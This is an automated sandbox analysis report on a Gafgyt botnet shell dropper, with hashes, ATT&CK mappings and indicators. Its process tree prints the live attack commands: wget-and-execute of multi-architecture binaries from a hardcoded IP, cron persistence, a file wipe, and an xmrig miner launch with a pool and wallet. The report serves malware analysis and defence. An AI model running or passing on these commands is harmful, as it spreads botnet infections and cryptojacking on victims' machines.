gafgyt | 5f52ba20358d35d9705d4893c2e28bf333f9920d13053b21352be4a1fa6c8199

Analysis

max time kernel
95s
max time network
128s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
09-11-2024 04:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tyo2831qq.sh
Size

1KB
MD5

e12d6a1166c4e290ed4ba39f96c780ad
SHA1

57038253b27c0312102758d25a77b5d1859cba3e
SHA256

5f52ba20358d35d9705d4893c2e28bf333f9920d13053b21352be4a1fa6c8199
SHA512

276aabcf2037ad435a105ded3f3bfb8491fb391d5e1d49942d41774807c3f0b4e15d1ed18a57f0d783cd9aafee3ce1a96e561d3ee6da02b5d6c51fc579bb91ee

Score

10^/10

gafgyt botnet defense_evasion discovery execution persistence privilege_escalatio

Malware Config

Extracted

Family

gafgyt

31.172.80.237:706

Signatures

Detected Gafgyt variant 2 IoCs

resource	yara_rule
behavioral1/files/fstream-2.dat	family_gafgyt
behavioral1/files/fstream-5.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 10 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1513	chmod
1516	chmod
1570	chmod
1583	chmod
1600	chmod
1509	chmod
1520	chmod
1524	chmod
1588	chmod
1594	chmod

Executes dropped EXE 43 IoCs

ioc	pid	Process
/tmp/bots	1514	bots
/tmp/fileibWhol	1526	fileibWhol
/tmp/filebGBbym	1527	filebGBbym
/tmp/filedQZH4W	1528	filedQZH4W
/tmp/fileIZmINp	1529	fileIZmINp
/tmp/fileyOeFL0	1530	fileyOeFL0
/tmp/filelEGrRt	1531	filelEGrRt
/tmp/fileNiUUx5	1532	fileNiUUx5
/tmp/file2WqZIz	1533	file2WqZIz
/tmp/fileD5R9Xa	1534	fileD5R9Xa
/tmp/fileGhyk4A	1535	fileGhyk4A
/tmp/filel8AkDc	1536	filel8AkDc
/tmp/fileCSmOoG	1537	fileCSmOoG
/tmp/fileVJaGhi	1538	fileVJaGhi
/tmp/fileGF37SJ	1539	fileGF37SJ
/tmp/fileoIRPGl	1540	fileoIRPGl
/tmp/fileoAru1O	1541	fileoAru1O
/tmp/fileDaBA4r	1542	fileDaBA4r
/tmp/filedLbafW	1543	filedLbafW
/tmp/file3O8iBx	1544	file3O8iBx
/tmp/fileAOvPk1	1545	fileAOvPk1
/tmp/fileCwJsFC	1546	fileCwJsFC
/tmp/fileyEYfs5	1547	fileyEYfs5
/tmp/fileueaHmH	1548	fileueaHmH
/tmp/fileH1vC07	1549	fileH1vC07
/tmp/filem6VSkI	1550	filem6VSkI
/tmp/fileh2Azrd	1551	fileh2Azrd
/tmp/filexXoNQO	1552	filexXoNQO
/tmp/fileOf8Bu8	1553	fileOf8Bu8
/tmp/file4hnC0J	1554	file4hnC0J
/tmp/fileI7IdvX	1555	fileI7IdvX
/tmp/fileQoM44m	1556	fileQoM44m
/tmp/fileLoiThM	1557	fileLoiThM
/tmp/fileUnYIGZ	1558	fileUnYIGZ
/tmp/filevfTFbq	1559	filevfTFbq
/tmp/file3rmi0O	1560	file3rmi0O
/tmp/filedOlYi6	1561	filedOlYi6
/tmp/fileFw29Lt	1562	fileFw29Lt
/tmp/fileyKTYD6	1564	fileyKTYD6
/tmp/filenm6bft	1565	filenm6bft
/tmp/fileJtGkIU	1566	fileJtGkIU
/tmp/fileouKtFj	1567	fileouKtFj
/tmp/filewTNYwB	1568	filewTNYwB

Creates/modifies Cron job 1 TTPs 42 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

description	ioc	Process
File opened for modification	/etc/cron.hourly/0	fileD5R9Xa
File opened for modification	/etc/cron.hourly/0	fileVJaGhi
File opened for modification	/etc/cron.hourly/0	fileoIRPGl
File opened for modification	/etc/cron.hourly/0	file3rmi0O
File opened for modification	/etc/cron.hourly/0	filedOlYi6
File opened for modification	/etc/cron.hourly/0	tyo2831qq.x86
File opened for modification	/etc/cron.hourly/0	filedQZH4W
File opened for modification	/etc/cron.hourly/0	fileNiUUx5
File opened for modification	/etc/cron.hourly/0	fileCSmOoG
File opened for modification	/etc/cron.hourly/0	fileAOvPk1
File opened for modification	/etc/cron.hourly/0	fileUnYIGZ
File opened for modification	/etc/cron.hourly/0	fileibWhol
File opened for modification	/etc/cron.hourly/0	fileCwJsFC
File opened for modification	/etc/cron.hourly/0	filem6VSkI
File opened for modification	/etc/cron.hourly/0	fileI7IdvX
File opened for modification	/etc/cron.hourly/0	fileLoiThM
File opened for modification	/etc/cron.hourly/0	filevfTFbq
File opened for modification	/etc/cron.hourly/0	filenm6bft
File opened for modification	/etc/cron.hourly/0	filebGBbym
File opened for modification	/etc/cron.hourly/0	filedLbafW
File opened for modification	/etc/cron.hourly/0	fileueaHmH
File opened for modification	/etc/cron.hourly/0	fileyKTYD6
File opened for modification	/etc/cron.hourly/0	fileyOeFL0
File opened for modification	/etc/cron.hourly/0	file2WqZIz
File opened for modification	/etc/cron.hourly/0	filel8AkDc
File opened for modification	/etc/cron.hourly/0	fileGF37SJ
File opened for modification	/etc/cron.hourly/0	fileDaBA4r
File opened for modification	/etc/cron.hourly/0	fileh2Azrd
File opened for modification	/etc/cron.hourly/0	file4hnC0J
File opened for modification	/etc/cron.hourly/0	fileJtGkIU
File opened for modification	/etc/cron.hourly/0	filelEGrRt
File opened for modification	/etc/cron.hourly/0	fileoAru1O
File opened for modification	/etc/cron.hourly/0	file3O8iBx
File opened for modification	/etc/cron.hourly/0	fileQoM44m
File opened for modification	/etc/cron.hourly/0	fileouKtFj
File opened for modification	/etc/cron.hourly/0	fileIZmINp
File opened for modification	/etc/cron.hourly/0	fileGhyk4A
File opened for modification	/etc/cron.hourly/0	fileyEYfs5
File opened for modification	/etc/cron.hourly/0	fileH1vC07
File opened for modification	/etc/cron.hourly/0	filexXoNQO
File opened for modification	/etc/cron.hourly/0	fileFw29Lt
File opened for modification	/etc/cron.hourly/0	fileOf8Bu8

Reads system routing table 1 TTPs 1 IoCs

Gets active network interfaces from /proc virtual filesystem.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	tyo2831qq.i586

Writes file to system bin folder 1 IoCs

description	ioc	Process
File opened for modification	/bin/ls	tyo2831qq.x86

Reads system network configuration 1 TTPs 1 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	tyo2831qq.i586

Reads runtime system information 43 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/self/exe	file2WqZIz
File opened for reading	/proc/self/exe	fileD5R9Xa
File opened for reading	/proc/self/exe	fileVJaGhi
File opened for reading	/proc/self/exe	fileoAru1O
File opened for reading	/proc/self/exe	fileCwJsFC
File opened for reading	/proc/self/exe	fileyEYfs5
File opened for reading	/proc/self/exe	fileQoM44m
File opened for reading	/proc/self/exe	filebGBbym
File opened for reading	/proc/self/exe	filelEGrRt
File opened for reading	/proc/self/exe	fileueaHmH
File opened for reading	/proc/self/exe	fileH1vC07
File opened for reading	/proc/self/exe	file4hnC0J
File opened for reading	/proc/self/exe	tyo2831qq.x86
File opened for reading	/proc/self/exe	fileibWhol
File opened for reading	/proc/self/exe	fileAOvPk1
File opened for reading	/proc/self/exe	filem6VSkI
File opened for reading	/proc/self/exe	fileI7IdvX
File opened for reading	/proc/self/exe	fileLoiThM
File opened for reading	/proc/self/exe	file3rmi0O
File opened for reading	/proc/self/exe	fileJtGkIU
File opened for reading	/proc/self/exe	filel8AkDc
File opened for reading	/proc/self/exe	fileGF37SJ
File opened for reading	/proc/self/exe	fileh2Azrd
File opened for reading	/proc/self/exe	filexXoNQO
File opened for reading	/proc/self/exe	fileFw29Lt
File opened for reading	/proc/self/exe	filewTNYwB
File opened for reading	/proc/self/exe	filedQZH4W
File opened for reading	/proc/self/exe	fileGhyk4A
File opened for reading	/proc/self/exe	fileDaBA4r
File opened for reading	/proc/self/exe	fileOf8Bu8
File opened for reading	/proc/self/exe	fileCSmOoG
File opened for reading	/proc/self/exe	file3O8iBx
File opened for reading	/proc/self/exe	fileUnYIGZ
File opened for reading	/proc/self/exe	filedOlYi6
File opened for reading	/proc/self/exe	fileyKTYD6
File opened for reading	/proc/self/exe	fileIZmINp
File opened for reading	/proc/self/exe	fileyOeFL0
File opened for reading	/proc/self/exe	fileNiUUx5
File opened for reading	/proc/self/exe	filedLbafW
File opened for reading	/proc/self/exe	fileouKtFj
File opened for reading	/proc/self/exe	fileoIRPGl
File opened for reading	/proc/self/exe	filevfTFbq
File opened for reading	/proc/self/exe	filenm6bft

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1510	tyo2831qq.mips
1598	rm
1505	wget

Writes file to tmp directory 52 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/file3O8iBx	filedLbafW
File opened for modification	/tmp/fileyEYfs5	fileCwJsFC
File opened for modification	/tmp/fileueaHmH	fileyEYfs5
File opened for modification	/tmp/fileOf8Bu8	filexXoNQO
File opened for modification	/tmp/tyo2831qq.m68k	wget
File opened for modification	/tmp/tyo2831qq.x86	wget
File opened for modification	/tmp/bots	tyo2831qq.x86
File opened for modification	/tmp/fileyOeFL0	fileIZmINp
File opened for modification	/tmp/filedLbafW	fileDaBA4r
File opened for modification	/tmp/filem6VSkI	fileH1vC07
File opened for modification	/tmp/fileh2Azrd	filem6VSkI
File opened for modification	/tmp/bots	wget
File opened for modification	/tmp/fileibWhol	tyo2831qq.x86
File opened for modification	/tmp/filedQZH4W	filebGBbym
File opened for modification	/tmp/fileI7IdvX	file4hnC0J
File opened for modification	/tmp/file3rmi0O	filevfTFbq
File opened for modification	/tmp/filedOlYi6	file3rmi0O
File opened for modification	/tmp/filewTNYwB	fileouKtFj
File opened for modification	/tmp/tyo2831qq.mpsl	wget
File opened for modification	/tmp/filelEGrRt	fileyOeFL0
File opened for modification	/tmp/fileVJaGhi	fileCSmOoG
File opened for modification	/tmp/fileoAru1O	fileoIRPGl
File opened for modification	/tmp/fileDaBA4r	fileoAru1O
File opened for modification	/tmp/tyo2831qq.arm7	wget
File opened for modification	/tmp/fileIZmINp	filedQZH4W
File opened for modification	/tmp/filel8AkDc	fileGhyk4A
File opened for modification	/tmp/fileGF37SJ	fileVJaGhi
File opened for modification	/tmp/fileAOvPk1	file3O8iBx
File opened for modification	/tmp/fileH1vC07	fileueaHmH
File opened for modification	/tmp/file4hnC0J	fileOf8Bu8
File opened for modification	/tmp/filekKP7GW	fileFw29Lt
File opened for modification	/tmp/fileJtGkIU	filenm6bft
File opened for modification	/tmp/fileX9kSc0	filewTNYwB
File opened for modification	/tmp/tyo2831qq.mips	wget
File opened for modification	/tmp/filebGBbym	fileibWhol
File opened for modification	/tmp/fileNiUUx5	filelEGrRt
File opened for modification	/tmp/fileCSmOoG	filel8AkDc
File opened for modification	/tmp/fileoIRPGl	fileGF37SJ
File opened for modification	/tmp/filevfTFbq	fileUnYIGZ
File opened for modification	/tmp/file2WqZIz	fileNiUUx5
File opened for modification	/tmp/filexXoNQO	fileh2Azrd
File opened for modification	/tmp/fileQoM44m	fileI7IdvX
File opened for modification	/tmp/fileLoiThM	fileQoM44m
File opened for modification	/tmp/fileUnYIGZ	fileLoiThM
File opened for modification	/tmp/fileFw29Lt	filedOlYi6
File opened for modification	/tmp/tyo2831qq.sh4	wget
File opened for modification	/tmp/fileD5R9Xa	file2WqZIz
File opened for modification	/tmp/fileGhyk4A	fileD5R9Xa
File opened for modification	/tmp/fileCwJsFC	fileAOvPk1
File opened for modification	/tmp/filenm6bft	fileyKTYD6
File opened for modification	/tmp/fileouKtFj	fileJtGkIU
File opened for modification	/tmp/tyo2831qq.arm6	wget

/tmp/tyo2831qq.sh
/tmp/tyo2831qq.sh
1⤵
PID:1504
- /usr/bin/wget
  wget http://31.172.80.237/tyo2831qq.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1505
- /bin/chmod
  chmod 777 tyo2831qq.mips
  2⤵
  - File and Directory Permissions Modification
  PID:1509
- /tmp/tyo2831qq.mips
  ./tyo2831qq.mips
  2⤵
  - System Network Configuration Discovery
  PID:1510
- /usr/bin/wget
  wget http://31.172.80.237/bots
  2⤵
  - Writes file to tmp directory
  PID:1512
- /bin/chmod
  chmod 777 bots
  2⤵
  - File and Directory Permissions Modification
  PID:1513
- /tmp/bots
  ./bots
  2⤵
  - Executes dropped EXE
  PID:1514
- /usr/bin/wget
  wget http://31.172.80.237/tyo2831qq.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1515
- /bin/chmod
  chmod 777 tyo2831qq.mpsl
  2⤵
  - File and Directory Permissions Modification
  PID:1516
- /tmp/tyo2831qq.mpsl
  ./tyo2831qq.mpsl
  2⤵
  PID:1517
- /usr/bin/wget
  wget http://31.172.80.237/tyo2831qq.sh4
  2⤵
  - Writes file to tmp directory
  PID:1519
- /bin/chmod
  chmod 777 tyo2831qq.sh4
  2⤵
  - File and Directory Permissions Modification
  PID:1520
- /tmp/tyo2831qq.sh4
  ./tyo2831qq.sh4
  2⤵
  PID:1521
- /usr/bin/wget
  wget http://31.172.80.237/tyo2831qq.x86
  2⤵
  - Writes file to tmp directory
  PID:1523
- /bin/chmod
  chmod 777 tyo2831qq.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1524
- /tmp/tyo2831qq.x86
  ./tyo2831qq.x86
  2⤵
  - Creates/modifies Cron job
  - Writes file to system bin folder
  - Reads runtime system information
  - Writes file to tmp directory
  PID:1525
- - /tmp/fileibWhol
    ./tyo2831qq.x86
    3⤵
    - Executes dropped EXE
    - Creates/modifies Cron job
    - Reads runtime system information
    - Writes file to tmp directory
    PID:1526
  - - /tmp/filebGBbym
      ./tyo2831qq.x86
      4⤵
      Executes dropped EXE
      Creates/modifies Cron job
      Reads runtime system information
      Writes file to tmp directory
      PID:1527
    - - /tmp/filedQZH4W
        
        ./tyo2831qq.x86
        5⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1528
      - /tmp/fileIZmINp
        
        ./tyo2831qq.x86
        6⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1529
        
        /tmp/fileyOeFL0
        
        ./tyo2831qq.x86
        7⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1530
        
        /tmp/filelEGrRt
        
        ./tyo2831qq.x86
        8⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1531
        
        /tmp/fileNiUUx5
        
        ./tyo2831qq.x86
        9⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1532
        
        /tmp/file2WqZIz
        
        ./tyo2831qq.x86
        10⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1533
        
        /tmp/fileD5R9Xa
        
        ./tyo2831qq.x86
        11⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1534
        
        /tmp/fileGhyk4A
        
        ./tyo2831qq.x86
        12⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1535
        
        /tmp/filel8AkDc
        
        ./tyo2831qq.x86
        13⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1536
        
        /tmp/fileCSmOoG
        
        ./tyo2831qq.x86
        14⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1537
        
        /tmp/fileVJaGhi
        
        ./tyo2831qq.x86
        15⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1538
        
        /tmp/fileGF37SJ
        
        ./tyo2831qq.x86
        16⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1539
        
        /tmp/fileoIRPGl
        
        ./tyo2831qq.x86
        17⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1540
        
        /tmp/fileoAru1O
        
        ./tyo2831qq.x86
        18⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1541
        
        /tmp/fileDaBA4r
        
        ./tyo2831qq.x86
        19⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1542
        
        /tmp/filedLbafW
        
        ./tyo2831qq.x86
        20⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1543
        
        /tmp/file3O8iBx
        
        ./tyo2831qq.x86
        21⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1544
        
        /tmp/fileAOvPk1
        
        ./tyo2831qq.x86
        22⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1545
        
        /tmp/fileCwJsFC
        
        ./tyo2831qq.x86
        23⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1546
        
        /tmp/fileyEYfs5
        
        ./tyo2831qq.x86
        24⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1547
        
        /tmp/fileueaHmH
        
        ./tyo2831qq.x86
        25⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1548
        
        /tmp/fileH1vC07
        
        ./tyo2831qq.x86
        26⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1549
        
        /tmp/filem6VSkI
        
        ./tyo2831qq.x86
        27⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1550
        
        /tmp/fileh2Azrd
        
        ./tyo2831qq.x86
        28⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1551
        
        /tmp/filexXoNQO
        
        ./tyo2831qq.x86
        29⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1552
        
        /tmp/fileOf8Bu8
        
        ./tyo2831qq.x86
        30⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1553
        
        /tmp/file4hnC0J
        
        ./tyo2831qq.x86
        31⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1554
        
        /tmp/fileI7IdvX
        
        ./tyo2831qq.x86
        32⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1555
        
        /tmp/fileQoM44m
        
        ./tyo2831qq.x86
        33⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1556
        
        /tmp/fileLoiThM
        
        ./tyo2831qq.x86
        34⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1557
        
        /tmp/fileUnYIGZ
        
        ./tyo2831qq.x86
        35⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1558
        
        /tmp/filevfTFbq
        
        ./tyo2831qq.x86
        36⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1559
        
        /tmp/file3rmi0O
        
        ./tyo2831qq.x86
        37⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1560
        
        /tmp/filedOlYi6
        
        ./tyo2831qq.x86
        38⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1561
        
        /tmp/fileFw29Lt
        
        ./tyo2831qq.x86
        39⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1562
- /usr/bin/wget
  wget http://31.172.80.237/tyo2831qq.arm6
  2⤵
  - Writes file to tmp directory
  PID:1569
- /bin/chmod
  chmod 777 tyo2831qq.arm6
  2⤵
  - File and Directory Permissions Modification
  PID:1570
- /tmp/tyo2831qq.arm6
  ./tyo2831qq.arm6
  2⤵
  PID:1571
- /usr/bin/wget
  wget http://31.172.80.237/tyo2831qq.x32
  2⤵
  PID:1573
- /bin/chmod
  chmod 777 tyo2831qq.i586
  2⤵
  - File and Directory Permissions Modification
  PID:1583
- /tmp/tyo2831qq.i586
  ./tyo2831qq.i586
  2⤵
  - Reads system routing table
  - Reads system network configuration
  PID:1584
- /usr/bin/wget
  wget http://31.172.80.237/tyo2831qq.m68k
  2⤵
  - Writes file to tmp directory
  PID:1587
- /bin/chmod
  chmod 777 tyo2831qq.m68k
  2⤵
  - File and Directory Permissions Modification
  PID:1588
- /tmp/tyo2831qq.m68k
  ./tyo2831qq.m68k
  2⤵
  PID:1589
- /usr/bin/wget
  wget http://31.172.80.237/tyo2831qq.spc
  2⤵
  PID:1591
- /usr/bin/wget
  wget http://31.172.80.237/tyo2831qq.arm4
  2⤵
  PID:1592
- /usr/bin/wget
  wget http://31.172.80.237/tyo2831qq.arm7
  2⤵
  - Writes file to tmp directory
  PID:1593
- /bin/chmod
  chmod 777 tyo2831qq.arm7
  2⤵
  - File and Directory Permissions Modification
  PID:1594
- /tmp/tyo2831qq.arm7
  ./tyo2831qq.arm7
  2⤵
  PID:1595
- /usr/bin/wget
  wget http://31.172.80.237/tyo2831qq.arm5
  2⤵
  PID:1597
- /bin/rm
  rm -rf tyo2831qq.arm6 tyo2831qq.arm7 tyo2831qq.i586 tyo2831qq.m68k tyo2831qq.mips tyo2831qq.mpsl tyo2831qq.ppc tyo2831qq.sh tyo2831qq.sh4 tyo2831qq.x32 tyo2831qq.x86
  2⤵
  - System Network Configuration Discovery
  PID:1598
- /usr/bin/wget
  wget https://github.com/m3Mastika/Dockerfile/raw/refs/heads/main/xmrig
  2⤵
  PID:1599
- /bin/chmod
  chmod 777 xmrig
  2⤵
  - File and Directory Permissions Modification
  PID:1600
- /tmp/xmrig
  ./xmrig --url pool.hashvault.pro:80 --user 48mn9hwNxkfjYAppkEaghU1pRbaThMVmnFHuQT44TTDRLLaUsDNCyWDStDZ5DjUqyLaiaywMirbPp1y1zPiVgCeV35ENMV7 --pass bos -B
  2⤵
  PID:1601

/tmp/fileyKTYD6
./tyo2831qq.x86
1⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1564
- /tmp/filenm6bft
  ./tyo2831qq.x86
  2⤵
  - Executes dropped EXE
  - Creates/modifies Cron job
  - Reads runtime system information
  - Writes file to tmp directory
  PID:1565
- - /tmp/fileJtGkIU
    ./tyo2831qq.x86
    3⤵
    - Executes dropped EXE
    - Creates/modifies Cron job
    - Reads runtime system information
    - Writes file to tmp directory
    PID:1566
  - - /tmp/fileouKtFj
      ./tyo2831qq.x86
      4⤵
      Executes dropped EXE
      Creates/modifies Cron job
      Reads runtime system information
      Writes file to tmp directory
      PID:1567
    - - /tmp/filewTNYwB
        
        ./tyo2831qq.x86
        5⤵
        Executes dropped EXE
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1568

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/etc/cron.hourly/0

Filesize
92B

MD5
3f006f7f81fc17be7f4a0d3da0fad5de

SHA1
97a94d3d0654c6551057af3809b52572bd7f9f5d

SHA256
982f9e0f089b91ba79df723435099df15c72e1201a45010ee60226ab136c93bf

SHA512
97d2ac0057427b940ada7c0fc805c1966e2535c3c3767ca85fef4a7e0fdc9d4ef9eb133530408b1e439df067881cb317e948ad9bfd487e958a04c97d9db978e0

Download Submit
/tmp/bots

Filesize
16KB

MD5
2615e32f9e7b42b36ba1f3dd6f8f7e3c

SHA1
4286d999a1a76da1e68cb227e01de237ef5fcf68

SHA256
e9bc9d0324b4943e9a9419c9be202331efe86a055768286b45a6ff80eb172078

SHA512
b9e21c618c03d111405f5d0e33d08a9bbe37ec6361773f02fde806a2cd784355cc43c64bce22ceeabc2a2e69f277989a26501085c6df725b8bccd9b52ce4ff78

Download Submit
/tmp/bots

Filesize
25KB

MD5
b0f19b181c8d6961d1fed5bda4def843

SHA1
6e00805b0e6204b1d0c249550567a385e2835226

SHA256
f4893c325586305fa20901ae1fa6059cc0fac29c57e915a2c6f79c99bb9b9bf7

SHA512
997cec78ea201ea7aafc17178dad49193832807971e2f56cbed487a17f1fb287f585f1022613e32ac70c0eac89ca9c253e4e860a2aa23589dc733fe8f8c94e9a

Download Submit
/tmp/fileibWhol

Filesize
156KB

MD5
a8a6992775589faecef1bc8cf38bdfc5

SHA1
b6903301aecf34539654f309b8c12773461920dc

SHA256
cae053bfac71081a19bd64ae66f3fc9a149bcbe492eeb46d33647e01ab18eb52

SHA512
dd803894a1bb9caa2bb4d1da70d35a531a7f76718d23392ff7ee511f489f413f2c79e82a3d7432685a36f470b69c74d211d18d050bee1a5d261c75131ee58fb8

Download Submit
/tmp/fileibWhol

Filesize
164KB

MD5
4ac062e7bafef554949de20763c54f7b

SHA1
24355a299d9aca3953a9fac256cdaf7be0249fda

SHA256
33368eb166229b262cb964cfa6412478278b2a23e5f0c3de24a56c28dac5eeb0

SHA512
b12f82c346dbe62b6a96e7c9d3185eb2fdca9cc29ba83e29a102fd746c93d72d919d8146840ab9338dc8a25a7fb2b400a0cd9d0ac2ea5a0471d283f81d115bb9

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads